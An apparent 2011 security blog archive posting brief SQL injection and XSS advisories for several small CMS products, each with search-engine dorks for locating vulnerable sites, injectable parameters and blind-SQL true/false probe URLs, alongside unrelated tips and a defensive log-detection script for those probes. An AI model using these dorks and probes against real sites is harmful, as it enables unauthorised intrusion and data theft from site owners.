Sunday, February 27, 2011

DOERS CMS Multiple Vulnerabilities


Title : DOERS CMS Multiple Vulnerabilities
Web : http://www.doers.in/
Found By: p0pc0rn 28/02/2011
Dork : intext:" powered by DOERS" asp

SQL
---

http://site.com/xxxx.asp?id=[SQL]
http://site.com/xxxx.asp?category=[SQL]
and more..

XSS
---
The following parameters can be XSS'ed:

currentPage=[XSS]
categoryname=[XSS]
page=[XSS]
cate=[XSS]
sub=[XSS]
and more..

POC
---


http://www.1337day.com/exploits/15522

thanks,
-p0pc0rn-

Saturday, February 26, 2011

Site Designed by Hypersoft Solutions is Vulnerable to SQL Injection


Title : Site Designed by Hypersoft Solutions is Vulnerable to SQL Injection
Web : http://www.hypersoftsolutions.com/
Found by: p0pc0rn 26/02/2011
Filetype: asp
Dork
: intext:"By: HypersoftSolutions.Com"
: inurl :"cms.asp?LinkId="


SQL
---
http://site.com/cms.asp?LinkId=[SQL]
http://site.com/cms.asp?CatId=[SQL]

POC
---
http://site.com/cms.asp?LinkId=1 and 1=1 TRUE
http://site.com/cms.asp?LinkId=1 and 1=0 FALSE


http://www.1337day.com/exploits/15514

thanks,
-p0pc0rn-

WebContent CMS Vulnerable to Multiple SQL Injection


Title : WebContent CMS Vulnerable to Multiple SQL Injection
Web : http://www.interbase.com.my/
Found by: p0pc0rn 26/02/2011
Dork
: intext:"Powered By Interbase WebContent"
: inurl:"cms/layout/Printer.asp?ProductID="
: intext:"Powered By WebContent"


SQL - Microsoft JET Database Engine
------------------------------------

http://site.com/cms/AllProduct.asp?CatID=[SQL]
http://site.com/cms/layout/Printer.asp?ProductID=[SQL]
http://site.com/cms/General.asp?ProductID=[SQL]



http://www.1337day.com/exploits/15513

thanks,
-p0pc0rn-

How to Protect Your Facebook Account From Being a Victim of a MiTM Attacker by Activating HTTPS



1 - Log in to your Facebook account.

2 - Go to Account > Account Settings.

3 - Scroll down and, at the Account security line, click change.

4 - Tick all boxes (recommended).

5 - Save and done! Your Facebook session will now be in HTTPS mode.



Addition


On the same line (Account security) you can also check from where your Facebook account has been logged in before.

Friday, February 25, 2011

PhUse™ CMS Vulnerable to Non Persistent XSS


Title : PhUse™ CMS Vulnerable to Non Persistent XSS
Web : http://www.phusecms.com : http://www.phusecms.co.uk
Found by: p0pc0rn 25/02/2011
Dork : intext:"Powered by PhUse™" : filetype:phuse "searchresults"

XSS
---
http://site.com/searchresults.phuse?q=[XSS]

POC
---



thanks.
-p0pc0rn-

RaksoCT Web Design Vulnerable to Multiple SQL Injection

Title : RaksoCT Web Design Vulnerable to Multiple SQL Injection
Web : http://raksoct.com/
Found By: p0pc0rn 25/02/2011


Blind SQL
----------
1 - Parameter gallery_details.asp?a_id=[Blind SQL]

POC
---
http://site.com//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://site.com//gallery_details.asp?a_id=12' and '0'='1 FALSE


2 - Parameter news.asp?intSeq=[Blind SQL]

POC
---
http://www.site.com/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE



3 - Parameter news.asp?id=[Blind SQL]

POC
---
http://www.site.com/news/news.asp?id=256 and 1=1 TRUE
http://www.site.com/news/news.asp?id=256 and 1=0 FALSE





http://www.exploit-db.com/exploits/16241/

Thanks
-p0pc0rn-
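
For defenders reviewing web-server logs, the TRUE/FALSE request pairs shown in the POC sections above (here and in the Hypersoft Solutions post) leave a recognisable trace. The following is an added example, not part of the original advisory: it flags any client that sent both a tautology and a contradiction test to the same parameter. The "client method target status" log layout, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Matches the tails used in the PoC URLs: " and 1=1", " and 1=0",
# "' and '1'='1", "' and '0'='1" (the value is already URL-decoded here).
PROBE = re.compile(
    r"^(?P<base>.*?)'?\s+and\s+'?(?P<lhs>\w+)'?\s*=\s*'?(?P<rhs>\w+)'?\s*$",
    re.IGNORECASE,
)

def classify(value):
    """Return 'TRUE' or 'FALSE' if value ends in a boolean test, else None."""
    m = PROBE.match(value)
    if m is None:
        return None
    return "TRUE" if m.group("lhs").lower() == m.group("rhs").lower() else "FALSE"

def find_boolean_probes(log_lines):
    """Return (client, path, param) keys that saw both a TRUE and a FALSE test."""
    seen = defaultdict(set)
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:
            continue  # not a request line in the assumed layout
        client, target = fields[0], fields[2]
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            verdict = classify(value)
            if verdict:
                seen[(client, parts.path, name)].add(verdict)
    return sorted(key for key, v in seen.items() if v == {"TRUE", "FALSE"})

# Constructed sample lines (documentation IP ranges, assumed log layout).
SAMPLE_LOG = [
    "203.0.113.7 GET /cms.asp?LinkId=1%20and%201=1 200",
    "203.0.113.7 GET /cms.asp?LinkId=1%20and%201=0 200",
    "203.0.113.7 GET /gallery_details.asp?a_id=12%27%20and%20%271%27=%271 200",
    "203.0.113.7 GET /gallery_details.asp?a_id=12%27%20and%20%270%27=%271 200",
    "198.51.100.20 GET /news/news.asp?id=256%20and%201=1 200",
    "198.51.100.20 GET /news/news.asp?id=256 200",
    "198.51.100.20 GET /search.asp?q=salt+and+pepper 200",
]

if __name__ == "__main__":
    for client, path, param in find_boolean_probes(SAMPLE_LOG):
        print(f"boolean-pair probe from {client}: {path} param {param}")
```

A lone TRUE test (the fifth sample line) is not reported; only a matched pair from one client against one parameter is, which keeps ordinary search terms containing "and" out of the results.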

Thursday, February 24, 2011

JuiceAPac CMS Multiple Vulnerabilities

Title    : Multiple Vulnerabilities in JuiceAPac CMS
Found by: p0pc0rn 24/02/2011
Web     : http://www.juiceapac.com
Dork     : intext:"Powered by JuiceAPac" filetype:cfm

SQL
---

http://site.com/xxxx.cfm?xxx=[SQL]


XSS
---

http://site.com/search.cfm
POST: THE_KEYWORDS=[XSS]&year=[XSS]

http://site.com/news.cfm?NewsID=[XSS]
// other parameters may be XSS'able too.


POC
---

http://www.1337day.com/exploits/15499

thanks
-p0pc0rn-

Wednesday, February 23, 2011

SQL and XSS in DIY Web CMS


found by : p0pc0rn 22/2/2011
web : http://www.mydiyweb.com.my
dork : intext:"powered by DiyWeb"

SQL - Microsoft JET Database Engine error
-----------------------------------------

http://site.com/template.asp?menuid=[SQL]
http://site.com/viewcatalog.asp?id=[SQL]
http://site.com/xxx.asp?id=[SQL]

XSS
---
http://site.com/diyweb/login.asp?msg=[XSS] -- login page



http://www.exploit-db.com/exploits/16205/

thanks
-p0pc0rn-

Monday, February 14, 2011

CMS Powered by sen9.com Multiple Vulnerabilities


SQL

http://site.com/productDetail.php?P_Id=[sql]
http://site.com/subPage.php?SP_Id=[sql]
http://site.com/videoDetail.php?V_Id=[sql]
http://site.com/journal.php?J_Id=[sql]




XSS

http://site.com/x.php?V_Name=[xss]&SE_Name=[xss]




Directory Listing


There are more vulnerabilities found.
I just highlight the high-risk vulnerabilities.

status:reported

thanks
-p0pc0rn-

Thursday, February 10, 2011

How to Enable Telnet in Windows 7

1 - Start > Control Panel

2 - Click Programs


3 - Under "Programs and Features", click "Turn Windows features on or off".


4 - A new box will pop up. Scroll down to find "Telnet Client", tick it and click OK. Done!


Alternatively, using the command prompt:

start /w pkgmgr /iu:"TelnetClient"

Monday, February 7, 2011

How to Play Snake in Youtube for fun!

How to Play Snake in Youtube

1 - Go to youtube.com

2 - Find any video

3 - Scroll the timeline to 0:00 and click pause

4 - Hold the left arrow key on your keyboard for a while, then press the up arrow key.

5 - The snake will appear and you are in the game! :D
